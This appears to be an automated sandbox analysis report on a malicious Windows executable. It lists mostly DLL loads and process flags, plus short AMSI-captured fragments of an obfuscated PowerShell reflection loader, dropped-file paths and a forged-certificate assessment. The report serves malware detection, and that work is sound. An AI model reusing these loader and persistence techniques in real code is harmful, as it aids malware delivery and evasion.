          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: 4PYRGCo1Di.exeStatic file information: File size 1530344 > 1048576
          Source: 4PYRGCo1Di.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000001.00000002.1207225710.0000000009B5A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((talesignals $Halflife $Perfectivity), (Nonconceptually @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Beviserne = [AppDomain]::CurrentDomain.GetAssemblies
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Overfladearealer)), $Eyeliner).DefineDynamicModule($Tilflytningskommunen, $false).DefineType($Predazzite, $Projecture, [System.Multica
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0601A8FA push es; ret 3_2_0601A900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0601F381 push 14418B04h; ret 3_2_0601F393
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_22303427 pushfd ; retf 3_2_22303428

          Persistence and Installation Behavior

          barindex
          Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject exactly) which is not trusted by system. 2) Organization name 'Nondispensational' appears fabricated and has no legitimate business reputation. 3) Email domain 'Jewett.St' is highly unusual and not a standard business domain. 4) Large time gap between compilation date (Aug 2020) and certificate creation (Oct 2024) suggests possible certificate manipulation. 5) Organization Unit name 'Hyphenates Raen Aeneid' appears randomly generated. 6) While US-based (El Paso, Texas) location isn't inherently suspicious, the combination with other factors suggests possible location spoofing. The certificate shows clear signs of being fraudulently created to appear legitimate while failing basic trust validation.
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Uncrude\4PYRGCo1Di.exeJump to dropped file
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeFile created: C:\Users\user\AppData\Local\Temp\nsa3CC1.tmp\nsExec.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
